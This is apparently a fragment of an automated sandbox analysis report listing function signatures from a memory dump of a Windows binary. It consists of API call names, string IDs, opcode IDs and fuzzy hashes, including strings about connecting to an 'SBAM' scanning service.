                                                                            • Instruction Fuzzy Hash: 6B71D27620065186EB26EF27A4047EA33A0FB4CBD4F444925EF5A677E1DF39D946CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: RectTimer$ClientKillWindow$MessagePointsSend$CursorInvalidateScreenUpdate
                                                                            • String ID:
                                                                            • API String ID: 2240750388-0
                                                                            • Opcode ID: 109f60e255d7a758d5ee912795749b92bdbf6b07a1fefe84cf19be051d996ad1
                                                                            • Instruction ID: d36d18874deb1fc5e0dd086220498b4da8b1af8b75a739c2893d3611c3aab569
                                                                            • Opcode Fuzzy Hash: 109f60e255d7a758d5ee912795749b92bdbf6b07a1fefe84cf19be051d996ad1
                                                                            • Instruction Fuzzy Hash: F5514676600A80C6FB159F62E4487ED3771F79DB89F044522DF0A1BAA9CFB8C589CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ErrorLastModule$ActivateCreateDeactivateFileFindHandleLibraryLoadNameQuerySectionString
                                                                            • String ID: Comctl32.dll$p
                                                                            • API String ID: 550771814-195350848
                                                                            • Opcode ID: aded4abf4d4cafa184d0226829c475abf3b6bc58da26b9b45449068d47a8b5ea
                                                                            • Instruction ID: ece1252bebf3b8dd387ad18c32440c035ceee8c5b176b74735128af69b847d8c
                                                                            • Opcode Fuzzy Hash: aded4abf4d4cafa184d0226829c475abf3b6bc58da26b9b45449068d47a8b5ea
                                                                            • Instruction Fuzzy Hash: F0414E75218B8482EB228F66F8487DBB3E1F7487A4F844229D799476F4DFB8C449CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MetricsSystem$CaptureClientCreateEllipticExceptionScreenThrowTimerWindow
                                                                            • String ID: $
                                                                            • API String ID: 3301921535-227171996
                                                                            • Opcode ID: e6f43742b678d023fc305bd9e3999284a3d558ce682968778dea901b4331dc63
                                                                            • Instruction ID: 030775b426fb00e064c524804a9e0fd04b1fe95ded799547a3fc7bddf6d804a6
                                                                            • Opcode Fuzzy Hash: e6f43742b678d023fc305bd9e3999284a3d558ce682968778dea901b4331dc63
                                                                            • Instruction Fuzzy Hash: 4841AA76600B8087E711CF26E848B9E77A5F78CBA8F558225DF9987BA4DF79C405CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetWindowRect.USER32 ref: 0000000140190627
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 00000001401919B7
                                                                              • Part of subcall function 0000000140191994: GetSystemMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 00000001401919DD
                                                                              • Part of subcall function 0000000140191994: SetMenuDefaultItem.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191A0C
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191A16
                                                                              • Part of subcall function 0000000140191994: IsZoomed.USER32 ref: 0000000140191A28
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A43
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A55
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191A67
                                                                              • Part of subcall function 0000000140191994: EnableMenuItem.USER32 ref: 0000000140191AB5
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191ABF
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191AE7
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191AF9
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191B03
                                                                              • Part of subcall function 0000000140191994: DeleteMenu.USER32(?,?,?,?,?,?,?,0000000140190650,?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140191B2B
                                                                              • Part of subcall function 0000000140191994: GetParent.USER32 ref: 0000000140191B3F
                                                                            • KillTimer.USER32(?,?,?,?,?,?,00000001,00000001401003D6), ref: 0000000140190661
                                                                            • GetKeyState.USER32 ref: 00000001401906AE
                                                                            • GetKeyState.USER32 ref: 00000001401906BD
                                                                            • GetFocus.USER32 ref: 000000014019070A
                                                                            • SetTimer.USER32 ref: 0000000140190759
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Menu$ItemParent$Enable$Delete$StateTimer$DefaultFocusKillRectSystemWindowZoomed
                                                                            • String ID: y$y$y$y$y
                                                                            • API String ID: 3553910245-2054889058
                                                                            • Opcode ID: 984148c2d0c6c885a147767a8df0ccb66796023bdd73b0505b58824dee323965
                                                                            • Instruction ID: 5130d2e5777dad0e9c96a37fcfd2db138c7864e2263cf56751cf2513b4374faf
                                                                            • Opcode Fuzzy Hash: 984148c2d0c6c885a147767a8df0ccb66796023bdd73b0505b58824dee323965
                                                                            • Instruction Fuzzy Hash: AA41F5326046408AFE779B27E9447EA2691A7DDFA4F140121DF89476B1CFB9C8D1CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ParentTimer$KillWindow$ClientCursorInvalidateMessageRectScreenSendUpdate
                                                                            • String ID:
                                                                            • API String ID: 2010726786-0
                                                                            • Opcode ID: d31cd8df75a69a0681ad43ad3f864289b333f351e40ff52015bd260131dfaf0b
                                                                            • Instruction ID: 830849909b2af931958280e66e6e889e8b92b99385ff9925b878fc68eb5854a0
                                                                            • Opcode Fuzzy Hash: d31cd8df75a69a0681ad43ad3f864289b333f351e40ff52015bd260131dfaf0b
                                                                            • Instruction Fuzzy Hash: 9AC14D75301A4082FE5ADB63E5547EA63A1AB8CFD0F494526DF8A4BBA1EF7CC441C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Intersect$Empty$ColorText
                                                                            • String ID:
                                                                            • API String ID: 1058108-0
                                                                            • Opcode ID: e6845464937a91cd32bc10ae8e108abd7035b1b1fd72c6295f984480cb704b5e
                                                                            • Instruction ID: 0cc79926276537c99997dfb8c4d36c348ed4c6e682c73a9456f0f32ef1d67f61
                                                                            • Opcode Fuzzy Hash: e6845464937a91cd32bc10ae8e108abd7035b1b1fd72c6295f984480cb704b5e
                                                                            • Instruction Fuzzy Hash: 4212B076B10A8486EB12DF26E8447ED63A1F78CF88F48422ADF4967BA5DF38C545C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ColorConditionInflateMaskObjectRectSelect$InfoMetricsSystemTextVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 4253551672-0
                                                                            • Opcode ID: 6a1add606dab6be897c190eecc6c4f0df1757a9691ffb258ab2a183d665a0945
                                                                            • Instruction ID: ca59eb07bfc7c55210e25ff9bcfeacde9c451ebb73a1793a27859a9ae15ea39c
                                                                            • Opcode Fuzzy Hash: 6a1add606dab6be897c190eecc6c4f0df1757a9691ffb258ab2a183d665a0945
                                                                            • Instruction Fuzzy Hash: 6AC17F76A106808BE721DF27E458B99BBA0F38CB98F048119EF5957BA4CF78D841CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Capture$ClientRectScreen$AsyncCursorMetricsParentReleaseStateSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 668609343-0
                                                                            • Opcode ID: 29a662a459f07e9b3f836a917a264d3e24cf87d1ff9f4ed4f177efe94b3f3f43
                                                                            • Instruction ID: 05afd8aefdcc5f09ac6a23b73f676dad12516db32ec77fafd39371f369ac0628
                                                                            • Opcode Fuzzy Hash: 29a662a459f07e9b3f836a917a264d3e24cf87d1ff9f4ed4f177efe94b3f3f43
                                                                            • Instruction Fuzzy Hash: 17817C7671578086EB26DBB6E8947ED27B1B74CF84F084026DF8A5BBA5DE39C441C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: AtlAdvise() failed and returned 0x%08X$CServerConnection::ISBScanControlInterface$CreateInstance(IUnknown sink delegate class) failed and returned 0x%08X$Failed to get the ServerConnection instance.$Failed to subscribe to ServerConnection state changes.$QueryInterface(IUnknown sink delegate class) failed and returned 0x%08X$SBAM.Common$Successfully subscribed to ServerConnection state changes.$TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBScanControl,&struct __s_GUID const _GUID_bbed8229_eb89_4853_b66a_39$There is no connection to the SBAM service. Not advising.
                                                                            • API String ID: 432778473-3567450281
                                                                            • Opcode ID: f1132e3db1ee851c7aa6a805d2b220358e27b0953dd71ad65e4a0da5fc31e84e
                                                                            • Instruction ID: 6f31c54e3296ce0b57a1d820e01a7ea196c973fec8fd8efb65a447e78071ab93
                                                                            • Opcode Fuzzy Hash: f1132e3db1ee851c7aa6a805d2b220358e27b0953dd71ad65e4a0da5fc31e84e
                                                                            • Instruction Fuzzy Hash: DA617E76100A9591FB22EF33E844BC96364F74C798F508516EB59832F5DFB8CA45C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: AtlAdvise() failed and returned 0x%08X$CServerConnection::ISBThreatDefinitionsInterface$CreateInstance(IUnknown sink delegate class) failed and returned 0x%08X$Failed to get the ServerConnection instance.$Failed to subscribe to ServerConnection state changes.$QueryInterface(IUnknown sink delegate class) failed and returned 0x%08X$SBAM.Common$Successfully subscribed to ServerConnection state changes.$TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBThreatDefinitions,&struct __s_GUID const _GUID_e426c725_b8ce_406a_9$There is no connection to the SBAM service. Not advising.
                                                                            • API String ID: 432778473-2209108740
                                                                            • Opcode ID: 87ee1c8e97dd53fbfe71bb23bfc25e6639226938038c4be17dfb130e074b4eb9
                                                                            • Instruction ID: 1d87a63bdc42cdc0d0fc18a1aced181bd28b350b14c826fd744a6dc1a2d4c070
                                                                            • Opcode Fuzzy Hash: 87ee1c8e97dd53fbfe71bb23bfc25e6639226938038c4be17dfb130e074b4eb9
                                                                            • Instruction Fuzzy Hash: 09617D76104B8681FA22EF33E488BC96365F74C798F908116EB59436F5DFB8CA85C391
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Create$EqualWindow$CombineIndirectRedraw
                                                                            • String ID: X
                                                                            • API String ID: 1400420921-3081909835
                                                                            • Opcode ID: 4519524f506afe1a51b2d19334bc70a0a419ba9bfd65e895bae58f33c3e024ab
                                                                            • Instruction ID: a82b96e196c48fb7f406e054c761b6a5117a70d7c7c7e256bb64d18451693267
                                                                            • Opcode Fuzzy Hash: 4519524f506afe1a51b2d19334bc70a0a419ba9bfd65e895bae58f33c3e024ab
                                                                            • Instruction Fuzzy Hash: AF518D767106908AE715CF66E948BEE77B0F75CB98F148124DF9A17AA8DF38D484CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRect
                                                                            • String ID:
                                                                            • API String ID: 2073123975-0
                                                                            • Opcode ID: 8b556cc825b79c826b2b1dc0784fc03dced48f5989e53aae9eeb3e53bbaf029b
                                                                            • Instruction ID: db9e63b8d2182378be00c8c08826e6456dd29741eb76c1e728c8a67cc08d0a0a
                                                                            • Opcode Fuzzy Hash: 8b556cc825b79c826b2b1dc0784fc03dced48f5989e53aae9eeb3e53bbaf029b
                                                                            • Instruction Fuzzy Hash: 1BC188766146808BE721DF27E444B9DBB60F789BD4F148225EF9847B68DF38D842CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CopyParentWindow
                                                                            • String ID:
                                                                            • API String ID: 642869531-0
                                                                            • Opcode ID: b122544f1e3ecdfed08cbb4ca23f8fd38f4dbc316605581de163c0d2c8ebb641
                                                                            • Instruction ID: 7c46f071e3dcc1a64aa52229fe20fea41dedef27c8f38e99f302925d6d22888b
                                                                            • Opcode Fuzzy Hash: b122544f1e3ecdfed08cbb4ca23f8fd38f4dbc316605581de163c0d2c8ebb641
                                                                            • Instruction Fuzzy Hash: BCB11976B106508AEB0ACF76D5447EE3BB1B74CB98F144515DF0AABBA8DB38D854CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CursorInfoMonitor$CopyEqualExtentFromInvalidateLoadParametersPointPoint32SystemTextUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 321205079-0
                                                                            • Opcode ID: 6763386de9334c7cb0d8c1d6a72666ed43279b6fa854cd6698aa9b42112c7a6b
                                                                            • Instruction ID: e4887efaeef2a1af96c7ac47cf22bf81dc3e1aeb0e456f061d257a43b5b6f21f
                                                                            • Opcode Fuzzy Hash: 6763386de9334c7cb0d8c1d6a72666ed43279b6fa854cd6698aa9b42112c7a6b
                                                                            • Instruction Fuzzy Hash: 00B17D727006908AEB16DF7AD458BED37A5FB88798F428125EF09576A5EF38C445CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$PointsRectWindow$ClientParentScroll
                                                                            • String ID:
                                                                            • API String ID: 3278275472-0
                                                                            • Opcode ID: b7a733b981df26b836237ec0e030c84bec98d52e5496d781637e799c9078919b
                                                                            • Instruction ID: 7548646a0b7c1f83116ac4ca6e88faafb4787589d70e6750a895f98de59cd08e
                                                                            • Opcode Fuzzy Hash: b7a733b981df26b836237ec0e030c84bec98d52e5496d781637e799c9078919b
                                                                            • Instruction Fuzzy Hash: 03718D36300A8086EB5ADB67E8587ED2761F79CBC8F044122EF0D47BA5DF79C9928740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CaptureWindow$BringCursorDispatchForegroundIndexInvalidateNearestPalettePeekRectReleaseTranslateWaitstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 95895181-0
                                                                            • Opcode ID: 3aa49993715ade2b147aa35eaa6107bf3c374193b2d4a07edba91201ee2da320
                                                                            • Instruction ID: f79edc5a27591c83c39bc4441d99a052ddf0a52bac6dbb4334e5183e713d6c20
                                                                            • Opcode Fuzzy Hash: 3aa49993715ade2b147aa35eaa6107bf3c374193b2d4a07edba91201ee2da320
                                                                            • Instruction Fuzzy Hash: AC515936305A8082FA6ADB27E4587ED63A1FB8DF90F184121DB9A477B1DF78C846C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Focus$Window$MessageRedrawSendVisible
                                                                            • String ID:
                                                                            • API String ID: 1465349162-0
                                                                            • Opcode ID: a0f8e752c7d6c951b02b81b95f304dfc7ec780fbd6279938dd5100218ac1065a
                                                                            • Instruction ID: 14901e82cffdc99a242cf5dae896e81aa1fedd9404aead98bb5372caa3a691ae
                                                                            • Opcode Fuzzy Hash: a0f8e752c7d6c951b02b81b95f304dfc7ec780fbd6279938dd5100218ac1065a
                                                                            • Instruction Fuzzy Hash: BD411C3531165142EE1AEB63E8993EA63A1BBCDFC0F494135DF4E4B7B2DE78D4418200
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Rect$Fill$InflateWindow
                                                                            • String ID: 2
                                                                            • API String ID: 3037358875-450215437
                                                                            • Opcode ID: 58061f454942a40bfbdb045d28eea74754b22fdfa9c1d6114f031c37b4fb75ef
                                                                            • Instruction ID: 1dd9f4106f79d29d9a3bb3df1d60e60a47b9dcd5ce4814544ed0c9883effd920
                                                                            • Opcode Fuzzy Hash: 58061f454942a40bfbdb045d28eea74754b22fdfa9c1d6114f031c37b4fb75ef
                                                                            • Instruction Fuzzy Hash: 6AF17B32B04A808AEB12DFA6E4447ED23B1B78DBD8F455216EF49677A5EF34C544C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleConditionCreateHashMaskObject$BitmapDeleteImplImpl::InfoMetricsSelectSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 821148471-3916222277
                                                                            • Opcode ID: 35b1456f474780a5decac3009dde12970bc71ffba1bfa3b31348209189299bbd
                                                                            • Instruction ID: ae8a37201005f473de6899875b8a4f25387225d58a64c4c8302452e398a6f266
                                                                            • Opcode Fuzzy Hash: 35b1456f474780a5decac3009dde12970bc71ffba1bfa3b31348209189299bbd
                                                                            • Instruction Fuzzy Hash: 31B19F36714A509AEB22DFB6D8547ED37B0F748798F504229EF4A97AB9DB38C805C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEventInflateMessageMouseParentSendTrackUpdateWindow
                                                                            • String ID: iii$
                                                                            • API String ID: 2492745705-462628325
                                                                            • Opcode ID: 2fe2a5ffbbe370e69f16cc8f4a1b6ab689d5a2eca5f4a4073c8456b908c10b46
                                                                            • Instruction ID: 92071a7e7c5ea8194467fbd5af9665b5459e8cddfe913b74ba258fdb208378e4
                                                                            • Opcode Fuzzy Hash: 2fe2a5ffbbe370e69f16cc8f4a1b6ab689d5a2eca5f4a4073c8456b908c10b46
                                                                            • Instruction Fuzzy Hash: FFB19F3620069087EB26DB23E4547EE77A1F78CF98F180225DB5A4BBA5CF7AD945C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color
                                                                            • String ID: $b
                                                                            • API String ID: 2811717613-2505604640
                                                                            • Opcode ID: 1f1eebc8388768d1e00e08cc88573fb66d0a91dba17edcf2c5092e8d02e67602
                                                                            • Instruction ID: eda85a597ed8addad1c25d791de72f9ebae6a4baa878bfdbe40bdd4c5f8dc2c9
                                                                            • Opcode Fuzzy Hash: 1f1eebc8388768d1e00e08cc88573fb66d0a91dba17edcf2c5092e8d02e67602
                                                                            • Instruction Fuzzy Hash: 3E413276A14A408BE751DF16F848B9A77A1F38CBA9F544115EB8947BB8CBBCC840CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                            • String ID: System
                                                                            • API String ID: 46613423-3470857405
                                                                            • Opcode ID: fe12a67df7abab3f56380aaaee1d5e4399ecba710e16424cea40da4aff6efe63
                                                                            • Instruction ID: 21fdedab7acfa7cb03b9ad71d12b663ee932c52a3aba46163a09143153753ead
                                                                            • Opcode Fuzzy Hash: fe12a67df7abab3f56380aaaee1d5e4399ecba710e16424cea40da4aff6efe63
                                                                            • Instruction Fuzzy Hash: 86215E35304B9096EB26DB22F818BDA77A1F74CB80F444529EE8D57BA4DF7DC50A8B00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Create$Timer$CopyIndirect$CombineCursorEventFocusInflateIntersectKillMessageMouseParentReleaseSendTrackUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2524255646-0
                                                                            • Opcode ID: 281531fa7e87e286c2c961035916e19313e3dd5e80cd303dd19577a3b0328d38
                                                                            • Instruction ID: 37362e1a807054d8c51cc00f1b38382e53b3556072748842684c5a3e28aa9c1a
                                                                            • Opcode Fuzzy Hash: 281531fa7e87e286c2c961035916e19313e3dd5e80cd303dd19577a3b0328d38
                                                                            • Instruction Fuzzy Hash: E3F1923160068086EB26DB67E4447EE73A0F789BD4F144225EB6A476F4DF7CD882C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientParentScreen$DestroyMenu$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3328890127-0
                                                                            • Opcode ID: 69b5f880db908b5f5960674ab7e35b71aba28e59b64114bcdcd527a13a4ccd81
                                                                            • Instruction ID: 560825b877e215d92fd2939ab6f46e9ca938f6008b0f79add04fa8548141971a
                                                                            • Opcode Fuzzy Hash: 69b5f880db908b5f5960674ab7e35b71aba28e59b64114bcdcd527a13a4ccd81
                                                                            • Instruction Fuzzy Hash: BAC12376615B8586FA16DB67E8547EE63A0FB8CF84F084526DF4A4BBA5DF38C401C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ExceptionThrow_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3659049137-0
                                                                            • Opcode ID: 5d17eaf185ffdb978cd8ed29a493107ab7ab525767a99fe0107cf950e07950d7
                                                                            • Instruction ID: 6c4419ad66843e1d7f34fdb89ae797a7b050ea5c70af3a74b15f9c8b7f90a012
                                                                            • Opcode Fuzzy Hash: 5d17eaf185ffdb978cd8ed29a493107ab7ab525767a99fe0107cf950e07950d7
                                                                            • Instruction Fuzzy Hash: 3EB1AF76300B8082EA6A9F57E5043DE67A5F788FD0F98402ACF59677A5DFB9D492C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Parent$Message$InvalidatePostRectSendUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 896913059-0
                                                                            • Opcode ID: b5b3f40dc9ddc2ac73b74f8c30526cafc64e641cca9fd8d94fddf65cf1e4f070
                                                                            • Instruction ID: 786f57cf6a034a787e6a78ada9e280f1ffd984d3bdf6938dc813696cabc2fe86
                                                                            • Opcode Fuzzy Hash: b5b3f40dc9ddc2ac73b74f8c30526cafc64e641cca9fd8d94fddf65cf1e4f070
                                                                            • Instruction Fuzzy Hash: 76A12D7530164141EE5BDB63E4697EA63A1BB8CFC4F488126DF4A4BBB2DE7DC8068340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Capture$ClientReleaseScreenWindow$CursorFromPointRectRedraw
                                                                            • String ID:
                                                                            • API String ID: 2024412728-0
                                                                            • Opcode ID: b1ab41c28cc93dd6ad6c82fcc193da542691f8e9f602a6fe679747054a3f0f47
                                                                            • Instruction ID: 20cf241f7fa661cc61fec453d85edec8eb5b304386ee8acfee547d513252cafa
                                                                            • Opcode Fuzzy Hash: b1ab41c28cc93dd6ad6c82fcc193da542691f8e9f602a6fe679747054a3f0f47
                                                                            • Instruction Fuzzy Hash: D8A1393A711A8186EB19DF66E6503ED2361F79DBC0F085226EF1A57BA1CF34D4A1CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
